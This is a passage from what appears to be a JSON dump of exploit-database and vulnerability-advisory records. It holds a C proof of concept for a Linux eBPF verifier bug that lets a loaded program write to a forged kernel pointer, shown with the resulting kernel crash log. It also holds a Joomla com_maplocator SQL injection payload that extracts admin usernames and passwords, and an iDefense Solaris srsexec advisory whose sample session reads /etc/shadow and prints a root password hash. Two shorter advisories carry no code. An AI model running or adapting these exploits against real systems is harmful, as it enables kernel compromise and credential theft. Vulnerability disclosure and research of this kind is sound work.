.src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r3 with value in range [0x0, 0xf], actually 0x8:\r\n // first load map value pointer...\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // ... then write, read, mask map value\r\n // (tracing actual values through a map is impossible)\r\n BPF_MOV32_IMM(BPF_REG_3, 8),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_3, 0),\r\n BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),\r\n BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),\r\n\r\n // load r1=0xffff'fff8 while working around the first verifier bug\r\n BPF_MOV32_IMM(BPF_REG_1, 0xfffffff8>>1),\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_1),\r\n\r\n // r1 in range [0xffff'fff8, 0x1'0000'0007]\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),\r\n\r\n // load r2=0\r\n BPF_MOV32_IMM(BPF_REG_2, 0),\r\n\r\n // trigger verifier bug:\r\n // visible range: [0xffff'fff8, 0xffff'ffff]\r\n // hidden range: [0, 7]\r\n // actual value: 0\r\n BPF_ALU32_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),\r\n\r\n // collapse down: verifier sees 1, actual value 0\r\n BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 31),\r\n\r\n // flip: verifier sees 0, actual value 1\r\n BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),\r\n BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -1),\r\n\r\n // r1 = 0x1000'0000'0000'0000, verifier sees 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 60),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badtrunc crasher_badtrunc.c\r\n-Wall && ./crasher_badtrunc\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere's the resulting crash:\r\n\r\n======================================\r\n[ 117.274571] general protection fault: 0000 [#2] SMP KASAN\r\n[ 117.274575] Modules linked in: binfmt_misc snd_hda_codec_generic\r\nqxl snd_hda_intel snd_hda_codec ttm snd_hda_core drm_kms_helper\r\nsnd_hwdep crct10dif_pclmul snd_pcm drm crc32_pclmul\r\nghash_clmulni_intel snd_timer pcbc aesni_intel aes_x86_64 snd\r\ncrypto_simd evdev glue_helper soundcore ppdev cryptd virtio_balloon sg\r\nvirtio_console serio_raw parport_pc parport pcspkr button ip_tables\r\nx_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto sr_mod sd_mod cdrom\r\nata_generic 8139too ehci_pci virtio_pci crc32c_intel ata_piix uhci_hcd\r\npsmouse virtio_ring virtio floppy ehci_hcd libata usbcore scsi_mod\r\n8139cp i2c_piix4 mii\r\n[ 117.274640] CPU: 1 PID: 1197 Comm: crasher_badtrun Tainted: G B\r\nD 4.15.0-rc1+ #4\r\n[ 117.274642] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[ 117.274645] task: 00000000a02f12e8 task.stack: 0000000051644a73\r\n[ 117.274651] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[ 117.274654] RSP: 0018:ffff8801af4e7838 EFLAGS: 00010292\r\n[ 117.274657] RAX: 0000000000000000 RBX: ffffc90001305108 RCX: ffffffff928483d7\r\n[ 117.274659] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac81e0f8\r\n[ 117.274661] RBP: ffff8801af4e7968 R08: 0000000000000000 R09: 0000000000000000\r\n[ 117.274664] R10: 0000000000000001 R11: ffffed003dfa0601 R12: ffffffff932be980\r\n[ 117.274666] R13: 1ffff10035e9cf0e R14: 00000000deadbeef R15: 0fff8801ac81e0f8\r\n[ 117.274669] FS: 00007f3efe927700(0000) GS:ffff8801f7640000(0000)\r\nknlGS:0000000000000000\r\n[ 117.274671] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 117.274674] CR2: 00005654507a9008 CR3: 00000001ec086003 CR4: 00000000001606e0\r\n[ 117.274678] Call Trace:\r\n[ 117.274685] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274688] ? bpf_jit_compile+0x30/0x30\r\n[ 117.274693] ? alloc_skb_with_frags+0x90/0x2c0\r\n[ 117.274697] ? __bpf_prog_run32+0x83/0xc0\r\n[ 117.274700] ? __bpf_prog_run64+0xc0/0xc0\r\n[ 117.274705] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274710] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[ 117.274715] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[ 117.274720] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274724] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274728] ? sock_alloc_inode+0x46/0x110\r\n[ 117.274731] ? unix_stream_connect+0x840/0x840\r\n[ 117.274734] ? __sock_create+0x7f/0x2c0\r\n[ 117.274737] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274742] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[ 117.274746] ? __wake_up_common_lock+0xaf/0x130\r\n[ 117.274752] ? unix_stream_connect+0x840/0x840\r\n[ 117.274755] ? sock_sendmsg+0x6b/0x80\r\n[ 117.274759] ? sock_write_iter+0x11d/0x1d0\r\n[ 117.274762] ? sock_sendmsg+0x80/0x80\r\n[ 117.274768] ? do_raw_spin_unlock+0x86/0x120\r\n[ 117.274782] ? iov_iter_init+0x77/0xb0\r\n[ 117.274786] ? __vfs_write+0x23e/0x340\r\n[ 117.274799] ? kernel_read+0xa0/0xa0\r\n[ 117.274805] ? __fd_install+0x5/0x160\r\n[ 117.274809] ? __fget_light+0x9b/0xb0\r\n[ 117.274813] ? vfs_write+0xe9/0x240\r\n[ 117.274817] ? SyS_write+0xa7/0x130\r\n[ 117.274820] ? SyS_read+0x130/0x130\r\n[ 117.274823] ? lockdep_sys_exit+0x16/0x8e\r\n[ 117.274827] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[ 117.274831] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274836] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[ 117.274885] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801af4e7838\r\n[ 117.274888] ---[ end trace e84b3275ee7b48c9 ]---\r\n======================================\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/29285", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-01T21:30:30", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-05-22T00:00:00", "published": "2011-05-22T00:00:00", "id": "1337DAY-ID-16168", "href": "https://0day.today/exploit/description/16168", "type": "zdt", "title": "Joomla Component com_maplocator SQL Injection Vulnerability", "sourceData": "<------------------- header data start ------------------- >\r\n#############################################################\r\nJoomla Component maplocator SQL Injection Vulnerability \r\n#############################################################\r\n\r\n# Author : Fl0riX ~ Bug Researchers\r\n\r\n# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line - SOLVER - All My Friends :)\r\n\r\n# Name : Joomla com_maplocator\r\n\r\n# info : http://extensions.joomla.org/extensions/maps-a-weather/geotagging/16996\r\n\r\n# Bug Type : SQL injection\r\n\r\n# Infection : Admin Login Bilgileri Alinabilir.\r\n\r\n# Demo site :\r\n[+]http://www.opensourcetechnologies.com/demos/maplocator\r\n\r\n[+] Example:\r\nsite.com/index.php?option=com_maplocator&view=state&cid=[EXPLOIT]\r\n\r\n# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.\r\n#############################################################\r\n< ------------------- header data end of ------------------- >\r\n< -- bug code start -- >\r\nEXPLOIT :\r\nnull+AND+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--\r\n< -- bug code end of -->\r\n \t\t \t \t\t\r\n\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16168"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "description": "Sun Microsystems Solaris SRS Proxy Core srsexec Arbitrary File Read\r\nVulnerability\r\n\r\niDefense Security Advisory 05.10.07\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 10, 2007\r\n\r\nI. BACKGROUND\r\n\r\nThe srsexec utility is part of the SRS Proxy Core package that is\r\navailable with Solaris 10. It is installed setuid root by default. For\r\nmore information about this software, visit the following URL.\r\n\r\nhttp://www.sun.com/service/netconnect/\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of a design error vulnerability in the srsexec binary\r\noptionally included in Sun Microsystems Inc., Solaris 10 allows\r\nattackers to gain access to sensitive information, such as the root\r\npassword hash.\r\n\r\nThe vulnerability specifically exists because of a failure to drop\r\npermissions or check the permissions on the file specified for the\r\ntarget file. If a user specified verify only mode (-v) as well as debug\r\nmode (-d), and specified a protected file such as /etc/shadow, srsexec\r\nwill display the first line of /etc/shadow in the debug messages. The\r\nfollowing demonstrates a sample exploitation session:\r\n\r\n $ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED\r\n verify_binary(OWNED)\r\n srsexec: binary_name: OWNED\r\n srsexec: name_buf: OWNED_______________\r\n binaries file line: root:omhyabndnAtNw:6\r\n binaries file line: :6445::::::\r\n smmsp:NP\r\n Security verification failed for binary: OWNED\r\n see SYSLOG(/var/adm/messages) for errors\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows attackers to gain access to\r\nthe root password hash or other sensitive information.\r\n\r\nIn order to exploit this vulnerability, an attacker must have local user\r\naccess to the system.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability in Solaris 10\r\nwith the SUNWsrspx package installed. In order to determine if this\r\npackage is installed, an administrator can execute the following\r\ncommand:\r\n\r\n # pkginfo SUNWsrspx\r\n\r\nIf this command returns 'ERROR: information for "SUNWsrspx" was not\r\nfound', then the system does not have the affected package installed\r\nand is not vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nRemove the setuid bit from the srsexec binary:\r\n\r\n # chmod -s /opt/SUNWsrspx/bin/srsexec\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nSun Microsystems has addressed this vulnerability with a patch release.\r\nFor more information, consult Sun Alert ID 102891 at the following URL.\r\n\r\nhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102891-1\r\n\r\nVII. CVE INFORMATION\r\n\r\nA Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not\r\nbeen assigned yet.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n11/07/2006 Initial vendor notification\r\n11/10/2006 Initial vendor response\r\n05/10/2007 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2007 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "modified": "2007-05-12T00:00:00", "published": "2007-05-12T00:00:00", "id": "SECURITYVULNS:DOC:16996", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16996", "title": "iDefense Security Advisory 05.10.07: Sun Microsystems Solaris SRS Proxy Core srsexec Arbitrary File Read Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "By using combination of -d and -v command line options it's possible to read first line of any file.", "modified": "2007-05-12T00:00:00", "published": "2007-05-12T00:00:00", "id": "SECURITYVULNS:VULN:7705", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7705", "title": "Sun Solaris srsexec unauthorized files accesss", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nAIX "getconf" Command Buffer Overflow Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA16996\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/16996/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nPrivilege escalation\r\n\r\nWHERE:\r\nLocal system\r\n\r\nOPERATING SYSTEM:\r\nAIX 5.x\r\nhttp://secunia.com/product/213/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in AIX, which can be exploited by\r\nmalicious, local users to gain escalated privileges.\r\n\r\nThe vulnerability is caused due to an unspecified boundary error in\r\nthe "getconf" command, which is part of the bos.rte.shell fileset.\r\nThis can be exploited to cause a buffer overflow and allows arbitrary\r\ncode execution with root privileges.\r\n\r\nThe vulnerability has been reported in AIX 5.2.0 and 5.3.0.\r\n\r\nSOLUTION:\r\nApply APARs.\r\nhttp://www-1.ibm.com/servers/eserver/support/pseries/aixfixes.html\r\n\r\nAPAR for AIX 5.2.0: \r\nIY73850 (available)\r\n\r\nAPAR for AIX 5.3.0:\r\nIY73814 (available)\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://www-1.ibm.com/support/docview.wss?uid=isg1IY73850\r\nhttp://www-1.ibm.com/support/docview.wss?uid=isg1IY73814\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-09-29T00:00:00", "published": "2005-09-29T00:00:00", "id": "SECURITYVULNS:DOC:9830", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9830", "title": "[SA16996] AIX "getconf" Command Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
